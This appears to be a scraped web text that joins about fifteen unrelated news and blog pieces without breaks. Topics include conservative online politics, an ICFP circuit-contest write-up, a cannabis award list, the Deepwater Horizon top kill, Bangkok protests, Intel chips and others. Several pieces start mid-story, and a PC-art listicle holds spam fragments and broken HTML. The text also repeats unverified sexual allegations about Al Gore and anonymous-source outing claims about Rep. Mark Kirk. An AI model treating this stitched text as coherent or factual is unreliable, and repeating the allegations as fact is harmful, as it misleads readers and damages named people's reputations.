" An engaged following is more likely to retweet , to comment on blogs , to respond to unfounded criticism , " Boston political consultant John LaRosa told Wired .
Of Brown 's campaign , he said , " it became a movement , and it just fed on itself . "
But even if more conservatives adopt Brown 's online strategy , right - wing constituents overall may be less comfortable with grass - roots activism .
Russell J. Dalton , a political science professor at the University of California , Irvine , says that among politically active youth , liberals are substantially more likely to donate money , attend a rally and participate in online discussions .
Republicans tend to see a " limited participatory role " for citizens , Dalton writes in his book " The Good Citizen : How a Younger Generation Is Reshaping American Politics . "
The conservative philosophy of ironclad loyalty to a singular message does have decided advantages .
In Congress , strong party loyalty has allowed Republicans to vote as a bloc , giving them formidable strength despite their minority status .
However , the internet is less predictable .
And , from what we have observed from the short life of the web , opening one 's site to the capricious innovations of grass - roots users can be enormously beneficial but hard to control .
Conservatives may one day embrace the participatory web en masse .
However , the very structure of the internet as a decentralized grouping of communities may never appeal to the large portion of right - wingers who prefer military - style hierarchies and commanding leaders .
And , as years go by without a conservative social - media pioneer or a top - ranked website , it looks as though the internet has already chosen a side .
The opinions expressed in this commentary are solely those of Gregory Ferenstein .
The Fixer
After years of complaints , why are there still holes in this sidewalk that could trip an unwary pedestrian ?
JUNE 24 -- In a bizarre statement to police , the Oregon woman who claims that Al Gore fondled and groped her during a massage session described the former Vice President as a giggling " crazed sex poodle " who gave a " come hither " look before pouncing on her in a Portland hotel suite .
In a taped January 2009 interview with cops , the 54 - year - old woman , a licensed masseuse whose name has been redacted from police records , read from a lengthy prepared statement that detailed her alleged October 2006 encounter with Gore at the Hotel Lucia .
Excerpts from the Portland Police Bureau transcript of the 2009 interview can be found here .
In December 2006 , a lawyer for the woman told police about the purported encounter , but after the masseuse cancelled three interview appointments , the case was closed due to her refusal to " cooperate with the investigation or even report a crime . "
It is unclear why , two years later , she approached Portland police and sought to memorialize her allegations against Gore , who she portrayed as a tipsy , handsy predator who forced her to drink Grand Marnier , pinned her to a bed , and forcibly French kissed her .
The woman 's statement -- which could be mistaken for R-rated Vice Presidential fan fiction -- describes Gore as a man with a " violent temper as well as extremely dictatorial commanding attitude besides his Mr. Smiley Global Warming concern persona . "
After fleeing Gore 's suite , the woman returned home to discover , a la Lewinsky , " stains on the front of my black slacks . "
Suspecting that the stains were Gore bodily fluids , the woman made sure not to clean them .
" I carefully hung them up and decided to be sure not to launder them until I knew more what to do with what had happened .
Just my intuition . "
While the masseuse hired a civil attorney , " I was not interested in making any money from this case , " she told cops .
" I did not want to be labeled a gold digger like the women in this situation are often labeled . "
The woman recently eased off this principled stand when she offered to sell her story to the National Enquirer for $ 1 million .
( 15 pages )
CLICK HERE to download a PDF of the Portland Police Bureau 's file on the Gore allegation ( it includes the 67 - page transcript of the woman 's January 2009 interview with cops ) .
One part of this year 's task was to build circuits in ternary logic .
The ternary gates have two ins and two outs , with different functions calculated by the two out pins .
In contrast to real - world circuits , the circuits to be built here cannot branch any pins at all .
So the circuits form a closed loop from the externa input to external output .
Gate functions
The gate functions computed are known from finite algebra , they can ( for instance ) be viewed as generalizations of XOR and NAND .
The functions are : l ' = l + 2r r' = 2 + lr where l and r are the left and right inputs ( respectively ) , and l ' and r' are the left and right outputs .
All operations are on Z/3Z , that is , addition and multiplication are mod 3 .
Building circuits
The basic technique here is to build components with the following two properties :
They output a known sequence the first cycle(s ) they output whatever input they had afterwards
For example , the circuit
will output a " 2 " the first cycle , and thereafter whichever input it got the cycle before .
There are similar three gate circuits for all three trits .
This technique , combined with code that appends circuits ( by connecting the output of one to the input of the other ) makes it possible to build circuits producing arbitrary output , by placing several such circuits in a sequence .
The last circuit decides the first output , and so on .
This approach requires a circuit of size 3 k for k output trits .
Circuit representation
The search for circuits is most likely NP - hard ( there are many similarities with both the Hamiltonian cycle and Quadratic Assignment Problem ) .
The goal in a three - day competition is therefore is to try to create heuristics to produce decent solutions in reasonable time .
The way I chose to represent circuits is by using two arrays .
These arrays contain for each gate the value of the outputs , and the indices of the two inputs .
The indices of the inputs refer to the output array , since most gates take their input from other gates ' output .
More specific , the even indices in the output array state [ 2 * i ] codes the left output ( a state is either " 0 " , " 1 " or " 2 " ) of gate number i , and state [ 2* i+1 ] contain the right output of gate i.
Similarily the inputs are stored in an array , where in p [ 2i ] and in p [ 2i+1 ] refers to which output the i:th gate reads its left and right input from , respectively .
The external input and output to a circuit are modeled as one extra entry in the input array and one extra state .
This means that state [ 2n ] should be set to the external input to the circuit , and in p [ 2n ] to the index of the circuits output , where n refers to the number of gates in the circuit .
In contrast what is common in real - world ( boolean ) circuit optimization , i use indices rather than pointers to the outputs .
This makes circuit merging , gate removing and general debugging easier .
This way , circuits of n gates can be enumerated by permutations of the inp array .
The number of circuits to consider is less than ( 2n+1 ) !.
Speeding up exhaustive searches
In principle the technique used is by exhaustive search of smaller circuits , and I 'll try to explain what I did to facilitate that .
The most basic approach to generate circuits of a size n is brute force enumeration of all permutations of [ 2n+1 ] , and using those as the input indices .
This is a decent way to enumerate all circuits of , say , up to 6 gates .
This can be done a little better .
The first trick is to note that there is no use of searching for gates of , say size 7 , that consist of one circuit of size 4 and another of size 3 , and no connections between these two .
That is the circuit should not contain cycles .
The catch is that doing a full connecticity check for every permutation is expensive .
A very simple cut technique is to just check for nodes only connected to themselves .
That is in p [ 2 * i ] / 2 == i && in p [ 2*i+1 ] / 2 == i for each node ( whose inputs was changed the last iteration ) .
When this happens the next permutation has to modify either in p [ 2 * i ] or in p [ 2*i+1 ] .
Despite its simplicity , this gives a notable increase in speed .
When searching for prefixes of a certain length , it is desired that the circuits have a " memory " of some length m .
It is therefore possible to prune the branch once there is a path of length < m between the external input and primary output .
One more trick could be to fix the input ( or output gate ) to some index , say 0 .
This to avoid searching for that many isomorphic circuits but with reordered gate indices .
This should give a huge ( factor 2n ) speedup ?
Right ?
Wrong .
This will prune too much .
The explanation is that the gates are evaluated from 0 to n , and the backwards arcs ( memory ) are sometimes necessary to find solutions with the smallest number of gates .
Tricks for generating smaller circuits
The first trick for producing smaller circuits is to search for circuits able to produce combinations of trits , rather than just one .
It turns out that there are six - gate circuits able to output any three trit combination .
This already reduces the size of a circuit producing an k - trit output to 2 k gates .
An example is the following 6 - gate circuit :
5R:2R3R0#2L3L , 4R5R0#5L4L , 0L3L0#X0L , 0R4L0 #2R0R , 1R5L0#3R1L , 1LX0#4R1R : 2L this outputs " 210 " , and then whatever input it got the from the first cycle and onwards .
All 27 three - trit combinations have 6 - gate representations .
Another trick is to use the input sequence to your advantage .
Say that you want to produce the sequence : 11021210112101221 1111
I think many contestants will recognize that , it is a fuel for the simple one - fuel car ( no , you do n't need to specify the last digit -- whatever it is , it 's a valid one ) .
Now , consider the following 6 - gate circuit : 5R:4R1L0#5L2R , 5R1R0#0R1R , 3R0R0 #4L3L , 2R3L0#3R2L , 2L5L0#X0L , 0LX0#4R1L : 4L
This produces the output : 102121011210122121 11110
The only thing missing is a " 1 " in front !
Prepending 2L:1R2R0#2R1R , 2L0R0#X0L , X0L0 # 1L0R : 1L gives a neat 9 - circuit fuel for this car .
Curious facts
The gate description allows for a " node type " to be specified , presumably to incorporate other gate functions .
Looping through the 69647 first node type values revealed no other valid node types .
The input sequence from the server is 01202101210201202 01202101210201202 ... and this sequence repeats ad infinitum ( I did not figure this out , someone on irc said it after the competition ) .
Update : I have been told by team THIRTEEN that the input sequence from the server is not repeating , and the information spread on irc is wrong .
Instead the server input can be described in blocks of four trits .
Let seq [ ] be an array representation of the server sequence , then for all k in N :
seq [ 4 k ] = 0 or 2 ( chosen uniformly at random ? )
seq [ 4k+1 ] = 1
seq [ 4k+2 ] = 2 - seq [ 4 k ]
seq [ 4k+3 ] = seq[k ]
This allows the construction of some really tiny fuels for the simple one fuel cars .
There were rumours on irc about a highly effective circuit compression scheme requiring only one gate per trit , based not on pure prefixes , but on building blocks that output some sequence , and then the input plus one ( or so ) .
Three such building blocks in a row would restore the original sequence .
My solvers are available here as linux x86 ( core2 ) 32 - bit binaries .
An exhaustive search of all 6 - gate circuits for producing the key prefix takes 21 seconds .
My binaries are not only faster , they are smaller than yours too ! ;-)
Real world circuit optimization Circuit optimization is a very real problem .
The less gates used to produce an equivalent circuit is cheaper to manufacture ( not to mention heat and timing disadvantages of larger chips ) .
There is both money and publications in good solutions to this problem
Anyone who is interested in trying , see here .
I got this data from a friend after explaining ICFP , so I have not yet tried to tune it .
It is the plan for today though .
Medical marijuana has gone mainstream in the Bay Area .
So much so that one of the " hot " places to be this past weekend was the first ever High Times Medical Cannabis Cup , which drew huge crowds in the City .
The event is a tamer version of Amsterdam 's annual Cannabis Cup , which has been growing strong there for more than 20 years .
It 's the Academy Awards of marijuana cultivators .
For two days hundreds of people plunked down $ 60 and packed the Terra Gallery on Harrison to learn everything about pot .
The highlight of the weekend is the Cannabis Cup Award .
A group of elite judges put their heads together pick the best ganja from dispensaries around the Bay Area .
Yes , personal testing was involved .
The two top winners were " God 's Pussy " by GreenBicycles and " Cali Gold " from Mr. Natural Inc .
Here 's the complete list of High Times Cannabis Cup Winners :
Sativa
GreanBicycles ( Vortex - a.k.a. God 's Pussy ) The Green Door San Francisco ( Candy Jack ) Purple Lotus Patient Center ( Durban Poison )
Indica
Mr. Natural Inc ( Cali Gold ) Elemental Wellness ( True OG ) Tehama Herbal Collective ( Bubba Kush )
Concentrates
1. Leonard Moore Cooperative ( Ingrid ) 2 . Phillips Rx ( Herojauna ) 3 . 7 Stars Holistic Healing Center ( Granddaddy Purple Wax )
Edibles
Greenway Compassionate Relief ( Biscotti ) Medithrive ( Bliss Edibles Truffles ) The Hampton Collective ( Totally Baked Medibles Tincture )
The expo brought together medical marijuana experts , growers , advocates and patients who featured seminars for cultivation and activism hosted by the big names in the medi - pot scene .
Patients with a valid medical marijuana recommendation were allowed to light up if they brought their own doobie in the outdoor " Prop 215 Section . "
When it comes to markets , I 'm pretty much like a fat kid and cake .. I just can't seem to stay away .
I recently had ( admittedly ) a dream corporate assignment to shoot several markets in south east Asia .
One image that I kept back found it 's way to a double page spread in this month 's Saveur ( pick up a copy and check out Robyn Eckhardt 's write up on markets in Thailand , Lao , Indonesia , and Vietnam ) .
The photos above ( as well as the Saveur shot ) were taken in Chiang Mai's Myung Mai market .
This is probably my favorite market in the region .
It 's a sprawling complex of wholesale and retail stalls that at the right time of year ( Jan - Mch ) between 7:15 am and 7:45 am has a great ' corridor ' of light that just makes everything pop out .
I first experienced this market ( and the morning light ) about 5 years .
At that time the location where the pics above were taken was a newly contructed but yet un-occupied shop house .
I slipped upstairs early one morning and shot 3 - 4 rolls of film before the merchants below raised their umbrellas and changed the whole scene .
When I got the corporate assignment I lobbied for Myung Mai with just that early morning shot from above in mind .
But then sometimes things do n't always go as planned .
On my first morning in Myung Mai I noticed that the shop where I needed to be was now occupied .
Of course I thought it would be no problem , chat the owner up and he 'll be more than happy to let me up on his balcony for those precious 30 minutes .
WRONG - I get the great big ' NO ' .
In fact , not even a ' no ' but a I do n't care if the door knob hit 's your fanny on the way out ' no ' .
So I figure - he just needs to ' warm ' to me , see me a few days .. then ask again .
Day 2 - does she know something I do n't ?
And what about these guys ..?
Turning their backs on me ?
But hey , I 'm not giving up .
I show up at the shop again .. not even up the second step when the owner shakes his head ' no '.. okey , dokey ..
Day 3 .
OK , now I 'm starting to panic .
I do n't have forever to finish this assignment and want that shot .
I shot some details , but I 'm thinking that ain't gonna cut it with my clients .
I need help .
I need an intermediary .
I need a miracle .
So I recruit the daughter of a close friend .
Smart , attractive , polite - game over I 'm thinking .
Together we stop by the shop one afternoon .
The owners son is there and once we explain what we are doing says it 'll be OK , but first let him check with his father .
We exchange numbers and wait for the good news .
It does n't come .. or more accurately .. we get the big ' no ' again .
Seems he 's concerned that I 'll fall off the roof and says there was a ' problem ' before .
But I think - let 's give him a day or two .
Day 4 - more general shots , good light , but the smoke had started to move in .
We try one more time and it happens -' OK , but you can't go on the roof '.. since I did n't want to go up that far anyway that was all I needed to hear .
I told them I would be there at 7:00 am the next day ( with bells on .. a though they told me to leave the bells at home ) .
Day of the shoot , thick , thick smoke blankets Chiang Mai .
Here 's the scene at 7:15 am ( but from the balcony ! ) ..
Long story short , I got the shot .
Not exactly what I wanted .
I could have used some better light but the shop owner turned out to be a really nice guy .
Brought me water , even invited me up to the roof ( I declined - the umbrellas were out by then - you can set your watch by these vendors ) .
So that 's as much a part of it as anything in my book .
The Detroit Red Wings took 5 - foot - 11 , 183 - pound left wing Teemu Pulkkinen from Finland with their fourth - round pick ( 111th overall ) in Saturday 's NHL entry draft at Staples Center in Los Angeles .
He played for Jokerit of the Finnish League last season .
Some projected Pulkkinen to be selected in the first or second round .
He was rated as the No. 46 prospect by TSN and No. 50 by The Hockey News .
Pulkkinen came into the season with a lot of hype but suffered wrist and ankle injuries and missed a good chunk of the season .
He returned for the under 18 team and put up big numbers ( 20 goals , 21 assists in 17 games ) .
McKeen 's draft guide said of Pulkkinen : " Although under sized , Pulkkinen is an absolute tyrant in the offensive zone .
He has sensational hand skills and passing ability and on the power - play he could be one of the most offensively gifted
players available for the draft .
His skating sets him back as he does not have a separation gear and possesses only modest speed .
Defensively , his game has come under some criticism as he does not always mark his man or drop below the blue line . ''
BANGKOK — Thai armored vehicles on Wednesday morning rammed through the barricades put up by antigovernment protesters , and infantry troops stormed into the protest zone , as the government moved aggressively against demonstrators who have occupied Bangkok ’s central retail district for more than six weeks .
Troops took control of key roads as well as a large park in the protest zone .
Television footage showed soldiers opening fire at the back of protesters , who were running for cover .
A government spokesman , Panitan Wattanayagorn , said the first phase of the operation had been " successful . "
“ We are going to focus on setting a perimeter , ” Mr. Panitan said on television .
“ We would like to reassure the citizens , the residents of Bangkok , that the operations are designed to make sure we stabilize the area . ”
Several fires raged around the protest zone , including what appeared on television to be a blaze engulfing a large block of buildings .
The zone itself is among the wealthiest neighborhoods in Bangkok and includes many corporate headquarters , high - end shopping malls , luxury hotels and high - rise apartment buildings .
One of the protest leaders , Weng Tojirakarn , appeared calm even as the operation was under way .
“ I have no gun , ” he said in an interview inside the encampment .
“ I ca n’t do anything . ”
Microsoft , a company known for amassing boatloads of money , announced Friday that it will be ending its futile efforts to give some of that money away .
The Bing Cashback program , which shared advertising revenue with Bing customers , did not generate enough interest , according to the Bing blog .
“ In lots of ways , this was a great feature – we had over a thousand merchant partners delivering great offers to customers and seeing great ROI on their campaigns , and we were taking some of the advertising revenue and giving it back to customers .
But after a couple of years of trying , we did not see the broad adoption that we had hoped for , ” Yusuf Mehdi explained on the Bing blog .
If you were one of the people who decided to get some of your hard - earned money back from Microsoft , you have until 9:00 PM PST on July 30th to earn any cash back on Bing shopping .
You will , however , be able to redeem any money made from cashback after that date , and Microsoft will continue to provide 12 months of customer service in case you want to complain about Bing Cashback ending .
Is this an indication that things are not going well for Bing in their attempts to topple Google ?
Probably not , but comments on the blog post indicated general disappointment .
Apparently , many people started using Bing specifically because of the cashback program .
To alleviate some concerns , Bing has promised to redirect the efforts and money spent on Bing Cashback into other programs for users and advertisers , although they gave no specific examples of what programs they have on the horizon .
Tags : Bing , Bing cashback , Microsoft
When Mr. Zapatero announced a move to stimulate the economy last week — an overhaul of the country ’s labor laws , which make it virtually impossible to fire older workers — unions , traditionally his allies , called for a general strike in September , the first one in nearly a decade .
“ These are painful times , ” said Ángel Torres Torres , the secretary general of economic policy and international affairs .
“ We have a model that we value .
We are a civilized society .
We pay taxes .
We take care of your needy .
The question is — is this sustainable ? ”
For Ms. Díaz and her partner , Robert García , also 34 , Spain ’s austerity measures — which include salary cuts for civil servants , pension freezes and the elimination of a $ 3,300 baby bonus — have been profoundly unsettling .
Only two years ago , the couple believed that they had made all the right choices , well on their way to a comfortable middle - class existence , with benefits that included subsidized child care and an interest - free mortgage available to municipal workers .
They were able to afford a large flat - screen television and vacations in Russia and China .
They retiled the kitchen and bathroom .
When their first child , Anders , was born 22 months ago , they used their baby bonus to buy a bigger car .
Now , Ms. Díaz wishes she could take back those purchases .
She is already budgeting for the 5 percent cut to her $ 2,000 - a- month salary and bracing for more .
The bare energy - saving light bulbs hanging from the ceiling in her living room will not get fixtures soon .
There will be no more evenings out .
And the indoor parking space will have to go .
More distressing still is that Mr. García , a driver at a construction site who spent last year unemployed , may lose his job again .
The water - distribution project he is working on — earning about $ 1,200 a month — may be on the list of capital improvements the government wants to postpone to save money .
But while waiting for that , and for the Lower Marine Riser Package ( LMRP ) , I thought I would spend a few paragraphs discussing why Top Kill may have failed as a substitute for my tech talk tonight ; you can find that under the fold by clicking " there 's more . "
In a couple of earlier posts I wrote about how it was necessary to fill the gaps that ran through the Blow - Out Preventer ( BOP ) either with spheres and triangles or with wire ( string would act similarly ) .
To refresh your memory , in the initial simpler analysis , I had put up a simple sketch of the BOP and well , to show how the blocking particles were injected .
Simple approximation of the situation
Now , unfortunately that diagram left a significant part out , and that is that there are three sets of pipes leading down into the well .
These are the well outer casing , which , surrounded by a layer of cement , holds the BOP in place .
Then there is the production casing , which had just been set to the full depth of the well .
And then there is the drill pipe that , at the time of the incident , extended down 8,367 ft from the platform , or roughly 3,367 ft below the BOP .
That drill pipe ( DP ) had previously been used to locate the production casing at the bottom of the well , and itself now rode inside that production casing .
In most normal operations it is closed at the bottom by a drill bit , but ( and I ’ll come back to this later ) , it had just finished the cementing of the production casing into position , and once it detached from that and was being pulled from the well , it was an open pipe all the way up to the rig floor .
And in that condition , it could be used for other things .
By pulling mud out of the DP and transferring it to the mud pits ( or standoff vessel ) , the level in the riser would fall and be replaced by seawater flowing in at the top .
Unfortunately this also lowered the weight of mud in the well , and that is what caused the oil and gas to flow into the well .
Outside of the DP is the casing and cement segments that make up the outer lining of the well .
The diagram presented in Congressional testimony , shows these various pipes , except for the central drill pipe .
Casing and cement down the Deepwater well
BP do not know , but believe that the oil is getting into the well through the cement wall at the bottom of the well , and probably rising up the well through the empty space ( annulus ) between the production casing and the outer lining of the well .
However the oil and gas may have broken through the bottom of the cement plug and be rising up within the production casing , in which it is also rising through the DP once the oil reaches its lower end .
It could also reach the bottom of the DP by flowing up the annulus then go down the production casing to the bottom of the DP and then back up into the BOP .
Most normal blowouts occur when the well is being drilled , and mud is flowing down , through the drill bit , and then back up the space ( the annulus ) between the DP and the rock wall .
Thus , when there is a blowout , the oil and gas that flow into the well normally flow up this outer passage to the rig , and give the spectacular fountain of oil .
The BOP was invented ( by Harry Cameron and Jim Abercrombie ) to stop that flow and to protect the crew at the surface .
Because the flow is normally up the outside of the drill pipe , the initial BOP designs were rams that pushed seals across the flow path through the BOP , and sealed against the side of the DP .
BOP open allowing flow through the annulus ( ASME )
BOP closed against the pipe , sealing the annulus ( ASME )
A BOP could have two of these mounted so that one sealed to the production casing in the well , and one to the drill pipe , but if underwater then the production casing is tied back to the Wellhead Collet Connector , and then the only tube running through the BOP will be the DP , to which they will seal .
BOP connection to casing at the seabed ( PCCI report for MMS )
The problem that this leaves , in the current situation , is that the pipe that runs through these two seals is open at the bottom to the oil flow .
So how can the flow through this be stopped ?
The answer is to mount a top ram set that has a set of shear cutting blades on it , that will cut through the pipe and seal the full face of the well .
Shear blades to cut through the DP and seal the well ( Varco )
The DP should shear , but would be held in place by the grip of the annular sealing rams below .
In this case it seems to be recognized that for some reason this shear event did not totally succeed .
Thus the pipe was not totally severed and the two shear plates did not fully move over one another to complete the seal .
Now this is where the problem arises , because , in part , that pipe is still open at its lower end .
If the leak is around the outside of the pipe , through a gap that has generated between the pipe and the annular seals , then the use of the junk shot to fill the cracks and gaps could conventionally have worked .
But the configuration of the rams on the Deepwater Horizon had changed from the initial simpler configuration to add seals for occasions where the drill pipe was not in place .
Ram layout on the BOP ( Times Picayune )
And the " junk " is being injected at the bottom of this stack .
Section through the BOP , showing the anticipated mud flow path ( initially from BP )
If the leak is coming up through the remnants of the drill pipe then life is complicated .
It ca n’t all be coming up through an undamaged pipe alone , since it was the far open end of that which was successfully closed at the beginning of the remedial steps , but if it is coming through the pipe and leaking out at the shear rams into the annulus that feeds into the riser , and out to the sea , then putting sealing particles into the bottom of the BOP to seal the cracks could have sealed some of the leakage around the DP trapped in the shears , but not that flowing through the shears in the remaining pipe section .
The reason that it ca n’t is that the access to that flow is occurring 3,367 ft below the riser , and there is no easy way to get the sealing particles down that far .
If they are mixed with mud and pushed down the well to that level and then released they have a different problem .
The hope when they were released into the well was that the flow of the current would be enough to carry them up to the cracks that they could seal .
But if they have to be carried down to the zone where the oil remains , then their density may be sufficiently high that they get into the flow without enough speed to lift them up into the BOP , instead it will cause them to sink to the bottom of the well .
The materials that BP tried included materials that might float on the surface , and might not be dense enough .
Those materials , including fibrous pieces of rope and chunks of rubber , were supposed to force more of the mud down the wellbore , but ultimately it did not work .
Rubber has a specific gravity of 0.91 and rope varies from 0.9 to 1.4 .
But remember that at that depth any buoyancy from air entrainment would be lost .
In other circumstances it might have worked , If they could have dropped the DP out of the shears perhaps , but they could n’t and it did n’t .
So on to the LMRP .
UPDATE : Thinking about this a little more , I had two more thoughts .
The first is that once the LMRP preparation cuts off the riser and the bent drill pipe , then the full weight of the pipe below the shears may come onto the section in the shear jaws at the moment , pulling them further out of alignment and increasing the flows .
It could also cause the pipe to drop out of the jaws , pulled out by the underlying weight , and hopefully not distorting them too much so that in the best of worlds they could then be cranked shut .
One could also , once the bent riser and pipe had been cut , go in down the pipe bit that extends up , go down past the annular seals with an abrasive jet lance ( most of the flow is around the DP as we have established above ) and cut it off , right above the shears .
Then partially open the shears , drop the pipe out , and close them again .
If they move all the way closed , without the obstruction , then the well may be sealed .
Until now , the government has discouraged strikes and censored reports about labor unrest , apparently out of fear that the reports could fuel other strikes and lead to social unrest .
But in the last few weeks , there have been reports  some in state newspapers  of several large strikes around the country .
This week , for instance , a local government - controlled union in the city of Shenyang has been negotiating with KFC , the fast - food giant , to secure a nearly 30 percent raise for workers .
Last Sunday , in another action , about 500 workers at Merry Electronics , a Taiwan - owned components maker , held a walkout that the company said was over a work dispute .
Later that day , the company announced a 22 percent pay increase , though a spokesman said the raise was unrelated to the strike .
Many economists say Chinese workers are gaining clout and that the country ’s low - cost manufacturing model is facing new strains .
Some analysts are arguing that the sharp rise in manufacturing wages could be a new lure to many workers from the inland provinces who have lately figured they could make just as much at home .
And yet , wages in many provinces have been rising 10 to 20 percent .
So it is hard to predict how much employers in southern China might eventually have to raise pay to offset labor shortages in their factories .
Many foreign companies have extensive manufacturing or production operations in China that potentially could be vulnerable to the same sort of plant - by - plant labor unrest playing out for Honda .
That includes the auto companies Daimler - Benz , Ford and General Motors , and also Coca - Cola and PepsiCo .
Some economists disagree that a major labor shift is under way , though , saying recent signs of worker unrest do not mean China ’s development model will rapidly change .
I always wondered what to do with my old computer parts , hated the old piece lying in my store for years .
I finally got an answer to my question , which is not only useful but is cool n awesome .
Here is the answer you guys might be looking for , like me .
1. Geek Version of Mona Lisa
Source
Chinese artists are now bringing a geekish touch in their art work .
From an art exhibition in Beijing , China .
The name of the piece ?
“ Technology Smiling ” .
2. Technology Filled Lamp
Source
The lamp literally filled with technology .
3. The Computer Bug
Offline Webinar Autopilot
com/articles/chips/artist-turns-old-pcbs-into-sculptures-20100323/”>Source
I wonder if it the same bug we are supposed to debug from our computer programs .
4. Circuit Egg
Source
I am thinking of making a cheese omelet out of it .
But who is going to eat this much circuits .
5 . Wallet made from a Compute Keyboard
Circuit sheet of a keyboard makes a surprisingly durable wallet .
Alternatively you could just take your hardware to a computer repair shop !
zp8497586rq
LONDON ( MarketWatch ) -- Oil giant BP BP , - 0.51 % BP , - 1.18 % said Friday that it may take a further 24 to 48 hours to complete the " top kill " procedure on the oil leak in the Gulf of Mexico .
If the well is successfully killed then cementing operations would follow , the group added .
BP said the cost of the response to date is around $ 930 million and that it has made payments on 11,650 of the roughly 26,000 claims that have been received so far .
The company said almost 1,300 vessels are now involved in the response effort and that operations to skim oil from the surface of the water have recovered 274,000 barrels of oily liquid .
What do you think , will it work ?
When Intel rather vaguely announced the cancellation of the second - generation Larrabee GPU effort , it hinted at a future for this same architecture in data - parallel computing and promised more news soon .
Today , at the International Supercomputing Conference , the firm delivered , announcing a broad strategy of targeting the high - performance computing market .
Intel ’s first full - fledged product for this market will be a chip code - named " Knight ’s Corner " built on a 22 - nm fab process .
The chip will feature " more than 50 cores " on a single piece of silicon .
Preliminary " Knights Ferry " development kits are said to be shipping now , and presumably , those are based on first - generation Larrabee silicon .
I ’ve not yet taken time to ask the right questions about these things , though , so I ’m simply speculating .
The press release says : " The Intel MIC architecture is derived from several Intel projects , including ‘ Larrabee ’ and such Intel Labs research projects as the Single - chip Cloud Computer . "
Which is clear as mud !
Interestingly enough , although this architecture , now dubbed Many Integrated Core ( MIC ) , may not compete in the discrete GPU space as once expected , it will face off rather directly in the HPC market against Nvidia ’s line of Tesla products based on the Fermi architecture .
Already , Intel is touting the advantages of x86 compatibility and cross-pollination with its Xeon processor ecosystem and development tools .
Whether Intel can succeed at solving other data - parallel computing problems without first building a chip capable of processing real - time graphics efficiently is an intriguing , and potentially vexing , question .
Rep . Mark Kirk is himself a servicemember , a Commander in the Naval Reserves for several decades with hoards of combat and intelligence awards .
However , when he first ran for office in 1999 , he made the strange move of publicly stating his support for an employment non-discrimination law that covers LGBT people .
He voted against the anti-gay Federal Marriage Amendment in 2006 , and has introduced many pro-gay resolutions in Congress , including , recently , a resolution co-sponsored with Tammy Baldwin condemning the arrest of the Malawi gay - couple .
Tuesday morning , HBO 's Outrage !
subject Michael Rogers sent the gay / progressive blogosphere abuzz when he revealed that Rep. Mark Kirk had been sexually involved with two men in both his undergraduate and law school years .
According to Rogers , these two men came forward after Kirk - who has enjoyed a long , unusually good relationship with the LGBT community despite being a Republican - voted to maintain the military 's status quo in discharging openly gay servicemembers .
Kirk is locked in a near dead heat in the race for President Obama 's former US Senate seat with Illinois state Treasurer , Alexi Giannoulias .
While Kirk has slid toward the right on LGBT rights , Gainnoulias announced back in the summer of 2009 that he supports the full slate of LGBT rights .
He not only supports ending Do n't Ask , Do n't Tell by passing the Military Readiness Enhancement Act , not only supports the Uniting American Families
Act which reunites same - sex binational couples , not only supports the Employment Non-Discrimination Act and the Domestic Partners Benefits and Obligations act ... but also supports ending the Defense of Marriage Act and full marriage equality .
When he stepped out of the primary just days before the vote , openly gay candidate Jacob Meister endorsed Alexi Giannoulias because of his strong pro-gay stances , his environmental and jobs talk , and his progressive credibility supporting healthcare for all and womens ' rights .
Kirk is a moderate , however , and he was for some reason very worried about losing the right wing base in his state .
Rather than count on Bill Brady bringing them to the polls anyway this fall , he instead threw his LGBT constituency under the bus to make a play for the wingnuts .
Rather than vote the right way on Do n't Ask , Don't Tell , or even simply missing the vote , Kirk made the vote and released the cowardly non-committal statement :
" Congressman Kirk is proud to serve our country in uniform .
He supports and abides by the Don't Ask Don't Tell policy . "
Enter Michael Rogers .
With a history of outing hypocritical gay anti-gay Republican politicians , Rogers has been described as one of the most feared men in Washington D.C.
Doubtless he has lists as long as my arm of other politicos who want it both ways : same - sex hook - ups and sex , while keeping their jobs secure with anti-gay rhetoric and votes .
And when Rogers has the smoking gun on a hypocrite , he pulls the trigger .
One of Rogers ' most famous gets was Larry Craig , who to this day still denies the rumors , even though he plead guilty after he was arrested in a bathroom soliciting sex from men .
However , Rogers also caught Dan Gurley , who was once the RNC 's anti-gay field director and is now an LGBT activist with Equality North Carolina .
Rogers ' work has some very positive outcomes .
Most positive is the slow implosion of that hypocritical closet in DC and other capitals around the nation .
Yet another example of the positive effect of outings are recent statements by Roy Ashburn , the vehemently anti-gay Republican California Assembly member caught drunk driving a trick home from a gay bar :
My practice in my entire political career when it came to gay issues was to prevent any kind of spotlight from being shined my way , because I was in hiding .
So casting any kind of vote might , could in some way , lead to my secret being revealed ....
That was terrifying to me .
It was paralyzing .
So I cast some votes that have denied gay people of their basic , equal treatment under the law , and I 'm not proud of it .
I 'm not going to do that again .
Protecting the closet is a sickness .
We argue " Oh , it 's their personal life , it 's nobody 's business " or " You should n't tear families apart . "
However , the deception and lies from the perpetrator is what disintegrates that family , not the honesty .
And what about our families ?
Our personal lives ?
If these hypocrites truly believed that this was " nobody 's business , " why did they cast these anti-gay votes ?
But what about Kirk ?
When these outings happen , and the mainstream media picks them up , the fallout is immense for the disgraced lawmaker .
They generally go into spin mode at first , and warily wait for the bottom to drop out and more and more secrets to come spewing forth .
The positive stories , however , end with reform .
Lawmakers who recognize their hypocrisy , apologize and work to correct those errors by working for equality in the future .
Then you have those who refuse to admit the obvious and shrink away from the lime - light .
While these dweebs generally do n't work for equality , they certainly stop working against it , choosing to avoid the attention all together .
Any way it 's sliced , these outings are a determent for the closeted to flaunt their anti-gay credentials and be present for those anti-gay votes .
However , will the mainstream media bite this one ?
Though Kirk 's ex-wife , Kim Vertolli , sincerely insisted to me that Kirk is definitely not gay , Mark Kirk 's gay rumors have been around a while .
His primary opponent , Andrew Martin , tried to make them an election issue , but they did not stick .
Though the existence of these rumors in the past may pique the mainstream media 's interest in this story , will they be compelled by the evidence that Rogers puts forth ?
" Not one or two , or three but 5 separate individuals contacted me about the now divorced Mr. Kirk .
( Mr. and Mrs. Kirk were married from 2001 to 2009 , the marriage produced no children . )
Within hours of the DADT repeal vote I was contacted by two people who knew Kirk from his college days .
" In law school in DC everyone knew Mark was gay , " the first source told me .
I explained that the information was intriguing , it would not be enough to go on .
He continued , " But I had sex with him a number of times . "
Well , now we 're onto something I thought .
" Could someone verify for me that you knew Kirk and went to school with him ? " I asked .
" Yes " was the swift reply .
" Could you recall personal details about Kirk that others may not know ? "
" Yes , " he said .
And he did .
The next source claimed to have gone to undergraduate school with Kirk .
I asked for proof that he and Kirk were in school together and once that was shared with me , I met with the source .
The source introduced me to a man who had also been friends with Kirk in college .
They both shared with me their interactions with Kirk , including one sexual in nature .
